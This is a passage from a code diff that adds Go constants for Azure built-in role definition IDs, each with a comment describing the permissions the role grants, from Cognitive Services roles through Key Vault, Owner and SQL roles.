create, edit, or delete projects. 
+ CognitiveServicesCustomVisionContributorRoleID string = "c1ff6cc2-c111-46fe-8896-e0ef812ad9f3" + + // Publish, unpublish or export models. Deployment can view the project but can’t update. + CognitiveServicesCustomVisionDeploymentRoleID string = "5c4089e1-6d96-4d2f-b296-c1bc7137275f" + + // View, edit training images and create, add, remove, or delete the image tags. Labelers can view the project but can’t update anything other than training images and tags. + CognitiveServicesCustomVisionLabelerRoleID string = "88424f51-ebe7-446f-bc41-7fa16989e96c" + + // Read-only actions in the project. Readers can’t create or update the project. + CognitiveServicesCustomVisionReaderRoleID string = "93586559-c37d-4a6b-ba08-b9f0940c2d73" + + // View, edit projects and train the models, including the ability to publish, unpublish, export the models. Trainers can’t create or delete the project. + CognitiveServicesCustomVisionTrainerRoleID string = "0a5ae4ab-0d65-4eeb-be61-29fc9b54394b" + + // Lets you read Cognitive Services data. + CognitiveServicesDataReaderRoleID string = "b59867f0-fa02-499b-be73-45a86b5b3e1c" + + // Lets you perform detect, verify, identify, group, and find similar operations on Face API. This role does not allow create or delete operations, which makes it well suited for endpoints that only need inferencing capabilities, following 'least privilege' best practices. + CognitiveServicesFaceRecognizerRoleID string = "9894cab4-e18a-44aa-828b-cb588cd6f2d7" + + // Provides access to create Immersive Reader sessions and call APIs + CognitiveServicesImmersiveReaderUserRoleID string = "b2de6794-95db-4659-8781-7e080d3f2b9d" + + // Has access to all Read, Test, Write, Deploy and Delete functions under LUIS + CognitiveServicesLUISOwnerRoleID string = "f72c8140-2111-481c-87ff-72b910f6e3f8" + + // Has access to Read and Test functions under LUIS. 
+ CognitiveServicesLUISReaderRoleID string = "18e81cdc-4e98-4e29-a639-e7d10c5a6226" + + // Has access to all Read, Test, and Write functions under LUIS + CognitiveServicesLUISWriterRoleID string = "6322a993-d5c9-4bed-b113-e49bbea25b27" + + // Has access to all Read, Test, Write, Deploy and Delete functions under Language portal + CognitiveServicesLanguageOwnerRoleID string = "f07febfe-79bc-46b1-8b37-790e26e6e498" + + // Has access to Read and Test functions under Language portal + CognitiveServicesLanguageReaderRoleID string = "7628b7b8-a8b2-4cdc-b46f-e9b35248918e" + + // Has access to all Read, Test, and Write functions under Language Portal + CognitiveServicesLanguageWriterRoleID string = "f2310ca1-dc64-4889-bb49-c8e0fa3d47a8" + + // Full access to the project, including the system level configuration. + CognitiveServicesMetricsAdvisorAdministratorRoleID string = "cb43c632-a144-4ec5-977c-e80c4affc34a" + + // Access to the project. + CognitiveServicesMetricsAdvisorUserRoleID string = "3b20f47b-3825-43cb-8114-4bd2201156a8" + + // Let’s you create, edit, import and export a KB. You cannot publish or delete a KB. + CognitiveServicesQnAMakerEditorRoleID string = "f4cc2bf9-21be-47a1-bdf1-5c5804381025" + + // Let’s you read and test a KB only. + CognitiveServicesQnAMakerReaderRoleID string = "466ccd10-b268-4a11-b098-b4849f024126" + + // Full access to Speech projects, including read, write and delete all entities, for real-time speech recognition and batch transcription tasks, real-time speech synthesis and long audio tasks, custom speech and custom voice. + CognitiveServicesSpeechContributorRoleID string = "0e75ca1e-0464-4b4d-8b93-68208a576181" + + // Access to the real-time speech recognition and batch transcription APIs, real-time speech synthesis and long audio APIs, as well as to read the data/test/model/endpoint for custom models, but can’t create, delete or modify the data/test/model/endpoint for custom models. 
+ CognitiveServicesSpeechUserRoleID string = "f2dc8367-1007-4938-bd23-fe263f013447" + + // Lets you read and list keys of Cognitive Services. + CognitiveServicesUserRoleID string = "a97b65f3-24c7-4388-baec-2e87135dc908" + + // Can manage data packages of a collaborative. + CollaborativeDataContributorRoleID string = "daa9e50b-21df-454c-94a6-a8050adab352" + + // Can manage resources created by AICS at runtime + CollaborativeRuntimeOperatorRoleID string = "7a6f0e70-c033-4fb1-828c-08514e5f4102" + + // This role allows user to share gallery to another subscription/tenant or share it to the public. + ComputeGallerySharingAdminRoleID string = "1ef6a3be-d0ac-425d-8c01-acb62866290b" + + // Grants full access to manage all resources, but does not allow you to assign roles in Azure RBAC, manage assignments in Azure Blueprints, or share image galleries. + ContributorRoleID string = "b24988ac-6180-42a0-ab88-20f7382dd24c" + + // Can read Azure Cosmos DB Accounts data + CosmosDBAccountReaderRoleID string = "fbdf93bf-df7d-467e-a4d2-9458aa1360c8" + + // Lets you manage Azure Cosmos DB accounts, but not access data in them. Prevents access to account keys and connection strings. + CosmosDBOperatorRoleID string = "230815da-be43-4aae-9cb4-875f7bd000aa" + + // Can submit restore request for a Cosmos DB database or a container for an account + CosmosBackupOperatorRoleID string = "db7b14f2-5adf-42da-9f96-f2ee17bab5cb" + + // Can perform restore action for Cosmos DB database account with continuous backup mode + CosmosRestoreOperatorRoleID string = "5432c526-bc82-444a-b7ba-57c5b0b5b34f" + + // Can view costs and manage cost configuration (e.g. budgets, exports) + CostManagementContributorRoleID string = "434105ed-43f6-45c7-a02f-909b2ba83430" + + // Can view cost data and configuration (e.g. budgets, exports) + CostManagementReaderRoleID string = "72fafb9e-0641-4937-9268-a91bfd8191a3" + + // Full access to DICOM data. 
+ DICOMDataOwnerRoleID string = "58a3b984-7adf-4c20-983a-32417c86fbc8" + + // Read and search DICOM data. + DICOMDataReaderRoleID string = "e89c7a3c-2f64-4fa1-a847-3e4c9ba4283a" + + // Lets you manage DNS resolver resources. + DNSResolverContributorRoleID string = "0f2ebee7-ffd4-4fc0-b3b7-664099fdad5d" + + // Lets you manage DNS zones and record sets in Azure DNS, but does not let you control who has access to them. + DNSZoneContributorRoleID string = "befefa01-2a29-4197-83a8-272ff33ce314" + + // Lets you manage everything under Data Box Service except giving access to others. + DataBoxContributorRoleID string = "add466c9-e687-43fc-8d98-dfcf8d720be5" + + // Lets you manage Data Box Service except creating order or editing order details and giving access to others. + DataBoxReaderRoleID string = "028f4ed7-e2a9-465e-a8f4-9c0ffdfdc027" + + // Create and manage data factories, as well as child resources within them. + DataFactoryContributorRoleID string = "673868aa-7521-48a0-acc6-0f60742d39f5" + + // Lets you submit, monitor, and manage your own jobs but not create or delete Data Lake Analytics accounts. + DataLakeAnalyticsDeveloperRoleID string = "47b7735b-770e-4598-a7da-8b91488b4c88" + + // Provides permissions to upload data to empty managed disks, read, or export data of managed disks (not attached to running VMs) and snapshots using SAS URIs and Azure AD authentication. + DataOperatorforManagedDisksRoleID string = "959f8984-c045-4866-89c7-12bf9737be2e" + + // Can purge analytics data + DataPurgerRoleID string = "150f5e0c-0603-4f03-8c7f-cf70034c4e90" + + // Contributor of the Desktop Virtualization Application Group. + DesktopVirtualizationApplicationGroupContributorRoleID string = "86240b0e-9422-4c43-887b-b61143f32ba8" + + // Reader of the Desktop Virtualization Application Group. + DesktopVirtualizationApplicationGroupReaderRoleID string = "aebf23d0-b568-4e86-b8f9-fe83a2c6ab55" + + // Contributor of Desktop Virtualization. 
+ DesktopVirtualizationContributorRoleID string = "082f0a83-3be5-4ba1-904c-961cca79b387" + + // Contributor of the Desktop Virtualization Host Pool. + DesktopVirtualizationHostPoolContributorRoleID string = "e307426c-f9b6-4e81-87de-d99efb3c32bc" + + // Reader of the Desktop Virtualization Host Pool. + DesktopVirtualizationHostPoolReaderRoleID string = "ceadfde2-b300-400a-ab7b-6143895aa822" + + // This role is in preview and subject to change. Provide permission to the Azure Virtual Desktop Resource Provider to start virtual machines. + DesktopVirtualizationPowerOnContributorRoleID string = "489581de-a3bd-480d-9518-53dea7416b33" + + // This role is in preview and subject to change. Provide permission to the Azure Virtual Desktop Resource Provider to start and stop virtual machines. + DesktopVirtualizationPowerOnOffContributorRoleID string = "40c5ff49-9181-41f8-ae61-143b0e78555e" + + // Reader of Desktop Virtualization. + DesktopVirtualizationReaderRoleID string = "49a72310-ab8d-41df-bbb0-79b649203868" + + // Operator of the Desktop Virtualization Session Host. + DesktopVirtualizationSessionHostOperatorRoleID string = "2ad6aaab-ead9-4eaa-8ac5-da422f562408" + + // Allows user to use the applications in an application group. + DesktopVirtualizationUserRoleID string = "1d18fff3-a72a-46b5-b4a9-0b38a3cd7e63" + + // Operator of the Desktop Virtualization Uesr Session. + DesktopVirtualizationUserSessionOperatorRoleID string = "ea4bfff8-7fb4-485a-aadd-d4129a0ffaa6" + + // This role is in preview and subject to change. Provide permission to the Azure Virtual Desktop Resource Provider to create, delete, update, start, and stop virtual machines. + DesktopVirtualizationVirtualMachineContributorRoleID string = "a959dbd1-f747-45e3-8ba6-dd80f235f97c" + + // Contributor of the Desktop Virtualization Workspace. + DesktopVirtualizationWorkspaceContributorRoleID string = "21efdde3-836f-432b-bf3d-3e8e734d4b2b" + + // Reader of the Desktop Virtualization Workspace. 
+ DesktopVirtualizationWorkspaceReaderRoleID string = "0fa44ee9-7a7d-466b-9bb2-2bf446b1204d" + + // Provides access to create and manage dev boxes. + DevCenterDevBoxUserRoleID string = "45d50f46-0b78-4001-a660-4198cbe8cd05" + + // Provides access to manage project resources. + DevCenterProjectAdminRoleID string = "331c37c6-af14-46d9-b9f4-e1909e1b95a0" + + // Lets you connect, start, restart, and shutdown your virtual machines in your Azure DevTest Labs. + DevTestLabsUserRoleID string = "76283e04-6283-4c54-8f91-bcf1374a3c64" + + // Allows for full access to Device Provisioning Service data-plane operations. + DeviceProvisioningServiceDataContributorRoleID string = "dfce44e4-17b7-4bd1-a6d1-04996ec95633" + + // Allows for full read access to Device Provisioning Service data-plane properties. + DeviceProvisioningServiceDataReaderRoleID string = "10745317-c249-44a1-a5ce-3a4353c0bbd8" + + // Gives you full access to management and content operations + DeviceUpdateAdministratorRoleID string = "02ca0879-e8e4-47a5-a61e-5c618b76e64a" + + // Gives you full access to content operations + DeviceUpdateContentAdministratorRoleID string = "0378884a-3af5-44ab-8323-f5b22f9f3c98" + + // Gives you read access to content operations, but does not allow making changes + DeviceUpdateContentReaderRoleID string = "d1ee9a80-8b14-47f0-bdc2-f4a351625a7b" + + // Gives you full access to management operations + DeviceUpdateDeploymentsAdministratorRoleID string = "e4237640-0e3d-4a46-8fda-70bc94856432" + + // Gives you read access to management operations, but does not allow making changes + DeviceUpdateDeploymentsReaderRoleID string = "49e2f5d2-7741-4835-8efa-19e1fe35e47f" + + // Gives you read access to management and content operations, but does not allow making changes + DeviceUpdateReaderRoleID string = "e9dba6fb-3d52-4cf0-bce3-f06ce71b9e0f" + + // Provides permission to backup vault to perform disk backup. 
+ DiskBackupReaderRoleID string = "3e5e47e6-65f7-47ef-90b5-e5dd4d455f24" + + // Used by the StoragePool Resource Provider to manage Disks added to a Disk Pool. + DiskPoolOperatorRoleID string = "60fc6e62-5479-42d4-8bf4-67625fcc2840" + + // Provides permission to backup vault to perform disk restore. + DiskRestoreOperatorRoleID string = "b50d9833-a0cb-478e-945f-707fcc997c13" + + // Provides permission to backup vault to manage disk snapshots. + DiskSnapshotContributorRoleID string = "7efff54f-a5b4-42b5-a1c5-5411624893ce" + + // Lets you manage DocumentDB accounts, but not access to them. + DocumentDBAccountContributorRoleID string = "5bd9cd88-fe45-4216-938b-f97437e15450" + + // Can manage Azure AD Domain Services and related network configurations + DomainServicesContributorRoleID string = "eeaeda52-9324-47f6-8069-5d5bade478b2" + + // Can view Azure AD Domain Services and related network configurations + DomainServicesReaderRoleID string = "361898ef-9ed1-48c2-849c-a832951106bb" + + // Lets you manage elastic san accounts + ElasticSanOwnerRoleID string = "80dcbedb-47ef-405d-95bd-188a1b4ac406" + + // Read Azure Elastic SAN and all sub-resources + ElasticSanReaderRoleID string = "af6a70f8-3c9f-4105-acf1-d719e9fca4ca" + + // Lets you manage a volume group in elastic san account + ElasticSanVolumeGroupOwnerRoleID string = "a8281131-f312-4f34-8d98-ae12be9f0d23" + + // Lets you manage EventGrid operations. + EventGridContributorRoleID string = "1e241071-0855-49ea-94dc-649edcd759de" + + // Allows send access to event grid events. + EventGridDataSenderRoleID string = "d5a91429-5739-47e2-a06b-3470a27159e7" + + // Lets you manage EventGrid event subscription operations. + EventGridEventSubscriptionContributorRoleID string = "428e0ff0-5e57-4d9c-a221-2c70d0e0a443" + + // Lets you read EventGrid event subscriptions. 
+ EventGridEventSubscriptionReaderRoleID string = "2414bbcf-6497-4faf-8c65-045460748405" + + // Experimentation Administrator + ExperimentationAdministratorRoleID string = "7f646f1b-fa08-80eb-a33b-edd6ce5c915c" + + // Experimentation Contributor + ExperimentationContributorRoleID string = "7f646f1b-fa08-80eb-a22b-edd6ce5c915c" + + // Allows for creation, writes and reads to the metric set via the metrics service APIs. + ExperimentationMetricContributorRoleID string = "6188b7c9-7d01-4f99-a59f-c88b630326c0" + + // Experimentation Reader + ExperimentationReaderRoleID string = "49632ef5-d9ac-41f4-b8e7-bbe587fa74a1" + + // Role allows user or principal full access to FHIR Data + FHIRDataContributorRoleID string = "5a1fc7df-4bf1-4951-a576-89034ee01acd" + + // Role allows user or principal to convert data from legacy format to FHIR + FHIRDataConverterRoleID string = "a1705bd2-3a8f-45a5-8683-466fcfd5cc24" + + // Role allows user or principal to read and export FHIR Data + FHIRDataExporterRoleID string = "3db33094-8700-4567-8da5-1501d4e7e843" + + // Role allows user or principal to read and import FHIR Data + FHIRDataImporterRoleID string = "4465e953-8ced-4406-a58e-0f6e3f3b530b" + + // Role allows user or principal to read FHIR Data + FHIRDataReaderRoleID string = "4c8d0bbc-75d3-4935-991f-5f3c56d81508" + + // Role allows user or principal to read and write FHIR Data + FHIRDataWriterRoleID string = "3f88fce4-5892-4214-ae73-ba5294559913" + + // Built-in Grafana admin role + GrafanaAdminRoleID string = "22926164-76b3-42b3-bc55-97df8dab3e41" + + // Built-in Grafana Editor role + GrafanaEditorRoleID string = "a79a5197-3a5c-4973-a920-486035ffd60f" + + // Built-in Grafana Viewer role + GrafanaViewerRoleID string = "60921a7e-fef1-4a43-9b16-a26c52ad4769" + + // Create and manage all aspects of the Enterprise Graph - Ontology, Schema mapping, Conflation and Conversational AI and Ingestions + GraphOwnerRoleID string = "b60367af-1334-4454-b71e-769d9a4f83d9" + + // Lets you read, write 
Guest Configuration Resource. + GuestConfigurationResourceContributorRoleID string = "088ab73d-1256-47ae-bea9-9de8e7131f31" + + // Lets you read and modify HDInsight cluster configurations. + HDInsightClusterOperatorRoleID string = "61ed4efc-fab3-44fd-b111-e24485cc132a" + + // Can Read, Create, Modify and Delete Domain Services related operations needed for HDInsight Enterprise Security Package + HDInsightDomainServicesContributorRoleID string = "8d8d5a11-05d3-4bda-a417-a08778121c7c" + + // Allows users to edit and delete Hierarchy Settings + HierarchySettingsAdministratorRoleID string = "350f8d15-c687-4448-8ae1-157740a3936d" + + // Can onboard new Hybrid servers to the Hybrid Resource Provider. + HybridServerOnboardingRoleID string = "5d1e5ee4-7c68-4a71-ac8b-0739630a3dfb" + + // Can read, write, delete, and re-onboard Hybrid servers to the Hybrid Resource Provider. + HybridServerResourceAdministratorRoleID string = "48b40c6e-82e0-4eb3-90d5-19e40f49b624" + + // Lets you manage integration service environments, but not access to them. + IntegrationServiceEnvironmentContributorRoleID string = "a41e2c5b-bd99-4a07-88f4-9bf657a760b8" + + // Allows developers to create and update workflows, integration accounts and API connections in integration service environments. + IntegrationServiceEnvironmentDeveloperRoleID string = "c7aa55d3-1abb-444a-a5ca-5e51e485d6ec" + + // Lets you manage Intelligent Systems accounts, but not access to them. + IntelligentSystemsAccountContributorRoleID string = "03a6d094-3444-4b3d-88af-7477090a9e5e" + + // Allows for full access to IoT Hub data plane operations. + IoTHubDataContributorRoleID string = "4fc6c259-987e-4a07-842e-c321cc9d413f" + + // Allows for full read access to IoT Hub data-plane properties + IoTHubDataReaderRoleID string = "b447c946-2db7-41ec-983d-d8bf3b1c77e3" + + // Allows for full access to IoT Hub device registry. 
+ IoTHubRegistryContributorRoleID string = "4ea46cd5-c1b2-4a8e-910b-273211f9ce47" + + // Allows for read and write access to all IoT Hub device and module twins. + IoTHubTwinContributorRoleID string = "494bdba2-168f-4f31-a0a1-191d2f7c028c" + + // Perform all data plane operations on a key vault and all objects in it, including certificates, keys, and secrets. Cannot manage key vault resources or manage role assignments. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultAdministratorRoleID string = "00482a5a-887f-4fb3-b363-3b7fe8e74483" + + // Perform any action on the certificates of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultCertificatesOfficerRoleID string = "a4417e6f-fecd-4de8-b567-7b0420556985" + + // Lets you manage key vaults, but not access to them. + KeyVaultContributorRoleID string = "f25e0fa2-a7c8-4377-a976-54943a77a395" + + // Perform any action on the keys of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultCryptoOfficerRoleID string = "14b46e9e-c2b7-41b4-b07b-48a6ebf60603" + + // Read metadata of keys and perform wrap/unwrap operations. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultCryptoServiceEncryptionUserRoleID string = "e147488a-f6f5-4113-8e2d-b22465e65bf6" + + // Perform cryptographic operations using keys. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultCryptoUserRoleID string = "12338af0-0e69-4776-bea7-57ae8d297424" + + // Read metadata of key vaults and its certificates, keys, and secrets. Cannot read sensitive values such as secret contents or key material. Only works for key vaults that use the 'Azure role-based access control' permission model. 
+ KeyVaultReaderRoleID string = "21090545-7ca7-4776-b22c-e363652d74d2" + + // Perform any action on the secrets of a key vault, except manage permissions. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultSecretsOfficerRoleID string = "b86a8fe4-44ce-4948-aee5-eccb2c155cd7" + + // Read secret contents. Only works for key vaults that use the 'Azure role-based access control' permission model. + KeyVaultSecretsUserRoleID string = "4633458b-17de-408a-b874-0445c86b69e6" + + // Knowledge Read permission to consume Enterprise Graph Knowledge using entity search and graph query + KnowledgeConsumerRoleID string = "ee361c5d-f7b5-4119-b4b6-892157c8f64c" + + // Role definition to authorize any user/service to create connectedClusters resource + KubernetesClusterAzureArcOnboardingRoleID string = "34e09817-6cbe-4d01-b1a2-e0eac5743d41" + + // Can create, update, get, list and delete Kubernetes Extensions, and get extension async operations + KubernetesExtensionContributorRoleID string = "85cb6faf-e071-4c9b-8136-154b5a04f717" + + // The lab assistant role + LabAssistantRoleID string = "ce40b423-cede-4313-a93f-9b28290b72e1" + + // The lab contributor role + LabContributorRoleID string = "5daaa2af-1fe8-407c-9122-bba179798270" + + // Lets you create new labs under your Azure Lab Accounts. + LabCreatorRoleID string = "b97fb8bc-a8b2-4522-a38b-dd33c7e65ead" + + // The lab operator role + LabOperatorRoleID string = "a36e6959-b6be-4b12-8e9f-ef4b474d304d" + + // The lab services contributor role + LabServicesContributorRoleID string = "f69b8690-cc87-41d6-b77a-a4bc3c0a966f" + + // The lab services reader role + LabServicesReaderRoleID string = "2a5c394f-5eb7-4d4f-9c8e-e8eae39faebc" + + // View, create, update, delete and execute load tests. View and list load test resources but can not make any changes. 
+ LoadTestContributorRoleID string = "749a398d-560b-491b-bb21-08924219302e" + + // Execute all operations on load test resources and load tests + LoadTestOwnerRoleID string = "45bb0b16-2f0c-4e78-afaa-a07599b003f6" + + // View and list all load tests and load test resources but can not make any changes + LoadTestReaderRoleID string = "3ae3fb29-0000-4ccd-bf80-542e7b26e081" + + // Log Analytics Contributor can read all monitoring data and edit monitoring settings. Editing monitoring settings includes adding the VM extension to VMs; reading storage account keys to be able to configure collection of logs from Azure Storage; adding solutions; and configuring Azure diagnostics on all Azure resources. + LogAnalyticsContributorRoleID string = "92aaf0da-9dab-42b6-94a3-d43ce8d16293" + + // Log Analytics Reader can view and search all monitoring data as well as and view monitoring settings, including viewing the configuration of Azure diagnostics on all Azure resources. + LogAnalyticsReaderRoleID string = "73c42c96-874c-492b-b04d-ab87d138a893" + + // Lets you manage logic app, but not access to them. + LogicAppContributorRoleID string = "87a39d53-fc1b-424a-814c-f7e04687dc9e" + + // Lets you read, enable and disable logic app. + LogicAppOperatorRoleID string = "515c2055-d9d4-4321-b1b9-bd0c9a0f79fe" + + // Allows for creating managed application resources. + ManagedApplicationContributorRoleID string = "641177b8-a67a-45b9-a033-47bc880bb21e" + + // Lets you read and perform actions on Managed Application resources + ManagedApplicationOperatorRoleID string = "c7393b34-138c-406f-901b-d8cf2b17e6ae" + + // Lets you read resources in a managed app and request JIT access. + ManagedApplicationsReaderRoleID string = "b9331d33-8a36-4f8c-b097-4f54124fdb44" + + // Lets you manage managed HSM pools, but not access to them. 
+ ManagedHSMcontributorRoleID string = "18500a29-7fe2-46b2-a342-b16a415e101d" + + // Create, Read, Update, and Delete User Assigned Identity + ManagedIdentityContributorRoleID string = "e40ec5ca-96e0-45a2-b4ff-59039f2c2b59" + + // Read and Assign User Assigned Identity + ManagedIdentityOperatorRoleID string = "f1a07417-d97a-45cb-824c-7a7467783830" + + // Managed Services Registration Assignment Delete Role allows the managing tenant users to delete the registration assignment assigned to their tenant. + ManagedServicesRegistrationassignmentDeleteRoleID string = "91c1777a-f3dc-4fae-b103-61d183457e46" + + // Management Group Contributor Role + ManagementGroupContributorRoleID string = "5d58bcaf-24a5-4b20-bdb6-eed9f69fbe4c" + + // Management Group Reader Role + ManagementGroupReaderRoleID string = "ac63b705-f282-497d-ac71-919bf39d939d" + + // Marketplace Admin grants full access to manage Private Azure Marketplace, including read and take action for private marketplace notifications, but does not allow to assign Marketplace Admin role to others + MarketplaceAdminRoleID string = "dd920d6d-f481-47f1-b461-f338c46b2d9f" + + // Create, read, modify, and delete Media Services accounts; read-only access to other Media Services resources. + MediaServicesAccountAdministratorRoleID string = "054126f8-9a2b-4f1c-a9ad-eca461f08466" + + // Create, read, modify, and delete Live Events, Assets, Asset Filters, and Streaming Locators; read-only access to other Media Services resources. + MediaServicesLiveEventsAdministratorRoleID string = "532bc159-b25e-42c0-969e-a1d439f60d77" + + // Create, read, modify, and delete Assets, Asset Filters, Streaming Locators, and Jobs; read-only access to other Media Services resources. + MediaServicesMediaOperatorRoleID string = "e4395492-1534-4db2-bedf-88c14621589c" + + // Create, read, modify, and delete Account Filters, Streaming Policies, Content Key Policies, and Transforms; read-only access to other Media Services resources. 
Cannot create Jobs, Assets or Streaming resources. + MediaServicesPolicyAdministratorRoleID string = "c4bba371-dacd-4a26-b320-7250bca963ae" + + // Create, read, modify, and delete Streaming Endpoints; read-only access to other Media Services resources. + MediaServicesStreamingEndpointsAdministratorRoleID string = "99dba123-b5fe-44d5-874c-ced7199a5804" + + // Microsoft Sentinel Automation Contributor + MicrosoftSentinelAutomationContributorRoleID string = "f4c81013-99ee-4d62-a7ee-b3f1f648599a" + + // Microsoft Sentinel Contributor + MicrosoftSentinelContributorRoleID string = "ab8e14d6-4a74-4a29-9ba8-549422addade" + + // Microsoft Sentinel Reader + MicrosoftSentinelReaderRoleID string = "8d289c81-5878-46d4-8554-54e1e3d8b5cb" + + // Microsoft Sentinel Responder + MicrosoftSentinelResponderRoleID string = "3e150937-b8fe-4cfb-8069-0eaf05ecd056" + + // Microsoft.Kubernetes connected cluster role. + MicrosoftKubernetesConnectedClusterRoleID string = "5548b2cf-c94c-4228-90ba-30851930a12f" + + // Can read and update Monitored Objects and associated Data Collection Rules. + MonitoredObjectsContributorRoleID string = "56be40e2-4db1-4ccf-93c3-7e44c597135b" + + // Can read all monitoring data and update monitoring settings. + MonitoringContributorRoleID string = "749f88d5-cbae-40b8-bcfc-e573ddc772fa" + + // Enables publishing metrics against Azure resources + MonitoringMetricsPublisherRoleID string = "3913510d-42f4-4e42-8a64-420c390055eb" + + // Can read all monitoring data. + MonitoringReaderRoleID string = "43d0d8ad-25c7-4714-9337-8ba259a9fe05" + + // Lets you manage networks, but not access to them. + NetworkContributorRoleID string = "4d97b98b-1d4f-4787-a291-c67834d212e7" + + // Lets you manage New Relic Application Performance Management accounts and applications, but not access to them. + NewRelicAPMAccountContributorRoleID string = "5d28c62d-5b37-4476-8438-e587778df237" + + // Provides user with ingestion capabilities for an object anchors account. 
+ ObjectAnchorsAccountOwnerRoleID string = "ca0835dd-bacc-42dd-8ed2-ed5e7230d15b" + + // Lets you read ingestion jobs for an object anchors account. + ObjectAnchorsAccountReaderRoleID string = "4a167cdf-cb95-4554-9203-2347fe489bd9" + + // Provides user with ingestion capabilities for Azure Object Understanding. + ObjectUnderstandingAccountOwnerRoleID string = "4dd61c23-6743-42fe-a388-d8bdd41cb745" + + // Lets you read ingestion jobs for an object understanding account. + ObjectUnderstandingAccountReaderRoleID string = "d18777c0-1514-4662-8490-608db7d334b6" + + // Grants full access to manage all resources, including the ability to assign roles in Azure RBAC. + OwnerRoleID string = "8e3af657-a8ff-443c-a75c-2fe8c4bcb635" + + // Provides contributor access to PlayFab resources + PlayFabContributorRoleID string = "0c8b84dc-067c-4039-9615-fa1a4b77c726" + + // Provides read access to PlayFab resources + PlayFabReaderRoleID string = "a9a19cc5-31f4-447c-901f-56c0bb18fcaf" + + // Allows read access to resource policies and write access to resource component policy events. + PolicyInsightsDataWriterRoleID string = "66bb4e9e-b016-4a94-8249-4c0511c2be84" + + // The user has access to perform administrative actions on all PowerApps resources within the tenant. + PowerAppsAdministratorRoleID string = "53be45b2-ad40-43ab-bc1f-2c962ac99ded" + + // PowerAppsReadersWithReshare can use the resource and re-share it with other users, but cannot edit the resource or re-share it with edit permissions. + PowerAppsReaderWithReshareRoleID string = "6877c72c-edd3-4048-9b4b-cf8e514477b0" + + // Lets you manage private DNS zone resources, but not the virtual networks they are linked to. + PrivateDNSZoneContributorRoleID string = "b12aa53e-6015-4669-85d0-8515ebb3ae7f" + + // The Microsoft.ProjectBabylon data curator can create, read, modify and delete catalog data objects and establish relationships between objects. This role is in preview and subject to change. 
+ ProjectBabylonDataCuratorRoleID string = "9ef4ef9c-a049-46b0-82ab-dd8ac094c889" + + // The Microsoft.ProjectBabylon data reader can read catalog data objects. This role is in preview and subject to change. + ProjectBabylonDataReaderRoleID string = "c8d896ba-346d-4f50-bc1d-7d1c84130446" + + // The Microsoft.ProjectBabylon data source administrator can manage data sources and data scans. This role is in preview and subject to change. + ProjectBabylonDataSourceAdministratorRoleID string = "05b7651b-dc44-475e-b74d-df3db49fae0f" + + // Deprecated role. + Purview1DeprecatedRoleID string = "8a3c2885-9b38-4fd2-9d99-91af537c1347" + + // Deprecated role. + Purview2DeprecatedRoleID string = "200bba9e-f0c8-430f-892b-6f0794863803" + + // Deprecated role. + Purview3DeprecatedRoleID string = "ff100721-1b9d-43d8-af52-42b69c1272db" + + // Read and create quota requests, get quota request status, and create support tickets. + QuotaRequestOperatorRoleID string = "0e5f05e5-9ab9-446b-b98d-1e2157c94125" + + // View all resources, but does not allow you to make any changes. + ReaderRoleID string = "acdd72a7-3385-48ef-bd42-f606fba81ae7" + + // Lets you view everything but will not let you delete or create a storage account or contained resource. It will also allow read/write access to all data contained in a storage account via access to storage account keys. + ReaderandDataAccessRoleID string = "c12c1c16-33a1-487b-954d-41c89c60f349" + + // Lets you manage Redis caches, but not access to them. + RedisCacheContributorRoleID string = "e0f68234-74aa-48ed-b826-c38b57376e17" + + // Provides user with conversion, manage session, rendering and diagnostics capabilities for Azure Remote Rendering + RemoteRenderingAdministratorRoleID string = "3df8b902-2a6f-47c7-8cc5-360e9b272a7e" + + // Provides user with manage session, rendering and diagnostics capabilities for Azure Remote Rendering. 
+ RemoteRenderingClientRoleID string = "d39065c4-c120-43c9-ab0a-63eed9795f0a" + + // Lets you purchase reservations + ReservationPurchaserRoleID string = "f7b75c60-3036-4b75-91c3-6b41c27c1689" + + // Lets one read and manage all the reservations in a tenant + ReservationsAdministratorRoleID string = "a8889054-8d42-49c9-bc1c-52486c10e7cd" + + // Lets one read all the reservations in a tenant + ReservationsReaderRoleID string = "582fc458-8989-419f-a480-75249bc5db7e" + + // Users with rights to create/modify resource policy, create support ticket and read resources/hierarchy. + ResourcePolicyContributorRoleID string = "36243c78-bf99-498c-9df9-86d9f8d28608" + + // Lets you manage SQL databases, but not access to them. Also, you can't manage their security-related policies or their parent SQL servers. + SQLDBContributorRoleID string = "9b7fa17d-e63e-47b0-bb0a-15c516ac86ec" + + // Lets you manage SQL Managed Instances and required network configuration, but can’t give access to others. + SQLManagedInstanceContributorRoleID string = "4939a1f6-9ae0-4e48-a1e0-f2cbe897382d" + + // Lets you manage the security-related policies of SQL servers and databases, but not access to them. + SQLSecurityManagerRoleID string = "056cd41c-7e88-42e1-933e-88ba6a50c9c3" + + // Lets you manage SQL servers and databases, but not access to them, and not their security -related policies. + SQLServerContributorRoleID string = "6d8ee4ec-f05a-4a1d-8b00-a9b17e38b437" + + // Provides access to manage maintenance configurations with maintenance scope InGuestPatch and corresponding configuration assignments + ScheduledPatchingContributorRoleID string = "cd08ab90-6b14-449c-ad9a-8f8e549482c6" + + // Lets you manage Scheduler job collections, but not access to them. + SchedulerJobCollectionsContributorRoleID string = "188a0f2f-5c9e-469b-ae67-2aa5ce574b94" + + // Read, write, and delete Schema Registry groups and schemas. 
